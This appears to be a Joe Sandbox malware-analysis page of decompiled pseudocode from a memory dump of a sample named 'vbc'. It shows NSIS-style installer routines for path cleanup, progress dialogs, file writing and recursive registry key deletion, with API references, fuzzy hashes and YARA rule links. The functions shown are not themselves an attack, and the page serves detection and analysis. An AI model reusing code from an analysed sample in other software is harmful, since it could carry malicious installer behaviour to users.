Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID:
API String ID: 1495540970-0
Opcode ID: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
Instruction ID: b1df74b24ef97eccf04675f52fbaffa54a328febca5869b92639b2b84e823bb6
Opcode Fuzzy Hash: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
Instruction Fuzzy Hash: 32219D71900518FACF119FA5DD84ACFBFB8EF85350F10842AF904B6290C7794A40DFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004068F5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004068F5(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FB4(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F6A(L"*?|<>/\":", _t5))) == 0) {
							E00406119(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004068f7
0x00406900
0x00406917
0x00406917
0x0040691e
0x0040692a
0x0040692a
0x0040692d
0x00406930
0x00406935
0x00406937
0x00406940
0x00406944
0x00406961
0x00406969
0x00406969
0x0040696e
0x00406970
0x00406973
0x00406978
0x00406979
0x0040697d
0x0040697d
0x0040697e
0x00406985
0x00406987
0x0040698e
0x00000000
0x00000000
0x00406996
0x0040699c
0x00000000
0x00000000
0x00000000
0x0040699c
0x004069a1

APIs

CharNextW.USER32(?), ref: 00406958
CharNextW.USER32(?), ref: 00406967
CharNextW.USER32(?), ref: 0040696C
CharPrevW.USER32(?,?), ref: 0040697F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004068F6
*?|<>/":, xrefs: 00406947

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3083651966
Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
Instruction ID: be6858c8d4b602c62de40fdc636a35535680886f1e3ed17f643e47e9e10769a1
Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
Instruction Fuzzy Hash: 0D11E6A580060295DB302B148C40A7762E8AF94750F12403FE98AB36C1E7BC4CA2C6BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x79f73c;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x79f73c = 0;
					return _t15;
				}
				if( *0x79f73c != 0) {
					return E00406A77(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x7a8aac) {
					if( *0x7a8aa8 == 0) {
						_t7 = CreateDialogParamW( *0x7a8aa0, 0x6f, 0, E00402F93, 0);
						 *0x79f73c = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x7a8b54 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056D0(0,  &_v132);
					}
				}
				return _t6;
			}

0x0040303d
0x0040303f
0x00403046
0x00403049
0x00403049
0x0040304f
0x00000000
0x0040304f
0x0040305d
0x00000000
0x00403060
0x00403067
0x00403073
0x0040307b
0x004030b9
0x004030c2
0x00000000
0x004030c7
0x00403084
0x00403095
0x00000000
0x004030a3
0x00403084
0x004030cf

APIs

DestroyWindow.USER32 ref: 00403049
GetTickCount.KERNEL32(00000000), ref: 00403067
wsprintfW.USER32 ref: 00403095

Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
Part of subcall function 004056D0: lstrcatW.KERNEL32 ref: 0040572B
Part of subcall function 004056D0: SetWindowTextW.USER32 ref: 0040573D
Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B

CreateDialogParamW.USER32 ref: 004030B9
ShowWindow.USER32(00000000,00000005), ref: 004030C7

Part of subcall function 00403012: MulDiv.KERNEL32 ref: 00403027

Strings

... %d%%, xrefs: 0040308F

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
Instruction ID: 36a9105e1bf518e5a00a94211bbaadb265df24d4843d4ed97aac6270594080be
Opcode Fuzzy Hash: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
Instruction Fuzzy Hash: 40015B70413610ABC7217FA0AD49A9A7FACAB01B06F50853BF441F25E9DA7C46458B9E

Uniqueness

Uniqueness Score: -1.00%

Function 00404F85 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404F85(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404f93
0x00404fa0
0x00404fa6
0x00404fe4
0x00404fe4
0x00404ff3
0x00404ffa
0x00000000
0x00404ffc
0x00404fa8
0x00404fb7
0x00404fbf
0x00404fc2
0x00404fd4
0x00404fda
0x00404fe1
0x00000000
0x00404fe1
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FA0
GetMessagePos.USER32 ref: 00404FA8
ScreenToClient.USER32(?,?), ref: 00404FC2
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FD4
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FFA

Strings

f, xrefs: 00404FD6

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 51d4338ac073bbeac8b2964ce5aa15998fcdd55d82c6f64f668885239b8ba4c4
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: D6015E7194021DBADB00DBA5DD85FFEBBBCAF54711F10012BBB50B61C0D7B49A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x7a8ab0 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fd3
0x00402fd8
0x00402fda
0x00402fda
0x00402fe5
0x00402ff5
0x00403007
0x00403007
0x0040300f

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
wsprintfW.USER32 ref: 00402FE5
SetWindowTextW.USER32 ref: 00402FF5
SetDlgItemTextW.USER32 ref: 00403007

Strings

verifying installer: %d%%, xrefs: 00402FDA
unpacking data: %d%%, xrefs: 00402FD3, 00402FE3

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
Instruction ID: 8fb0b87627a2e5c232f470bc2292a7be8d93e7e9342cf65e243ccc0cc3a46c1c
Opcode Fuzzy Hash: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
Instruction Fuzzy Hash: 74F0367050020DABEF246F50DD49BEA3B69EB40309F00C03AF606B51D0DBBD99549B59

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FB4(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406139(_t55);
				_t29 = E0040615E(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x7a8ab4;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035FE(_t49);
							E004035E8(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403377(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406119( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E00406210( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403377(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

0x00402950
0x00402952
0x00402957
0x0040295c
0x0040295f
0x00402969
0x0040296d
0x0040296d
0x00402973
0x00402980
0x00402988
0x0040298b
0x00402997
0x0040299a
0x004029a0
0x004029ae
0x004029b3
0x004029b7
0x004029ba
0x004029c3
0x004029cf
0x004029d3
0x004029d6
0x004029e0
0x004029ff
0x004029e7
0x004029ec
0x004029f4
0x004029f7
0x004029fc
0x004029fc
0x00402a06
0x00402a06
0x00402a13
0x00402a19
0x00402a1f
0x00402a1f
0x004029b7
0x00402a33
0x00402a35
0x00402a35
0x00402a3f
0x00402a40
0x00402a44
0x00402a48
0x00402a4e
0x00402a4e
0x00402a55
0x004022f1
0x00402c2d
0x00402c39

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
Instruction ID: ec4356a3eb6c7711b506d5a245a30aad41ccfdb787a60eec272099fea1c037c4
Opcode Fuzzy Hash: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
Instruction Fuzzy Hash: D431C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E1CB798D419B98

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064DB(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A3B(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402eb4
0x00402ebd
0x00402ec6
0x00402ed2
0x00402edb
0x00402ee5
0x00402f0a
0x00402f10
0x00402f15
0x00402f16
0x00402f46
0x00402f1f
0x00402f21
0x00402f71
0x00402f74
0x00000000
0x00402f7a
0x00402f30
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f3f
0x00402f44
0x00402f45
0x00402f45
0x00402f52
0x00402f5a
0x00402f61
0x00000000
0x00402f8a
0x00000000
0x00402f69
0x00402ef5
0x00402f08
0x00000000
0x00000000
0x00000000
0x00402f08
0x00402f90

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?), ref: 00402F74

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
Instruction ID: e84adf69fee3246f56ef13a6fd4e717e0861f51d99737fac189c4d1833cff19f
Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
Instruction Fuzzy Hash: 31213B7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21E0D7B59E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x7a8aa0,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065B5();
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32 ref: 00401DE5
LoadImageW.USER32 ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
Instruction ID: 474cd979728561ffe20026c9632071baa6ad0bc9fd2f813aa8d1396f3614d648
Opcode Fuzzy Hash: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
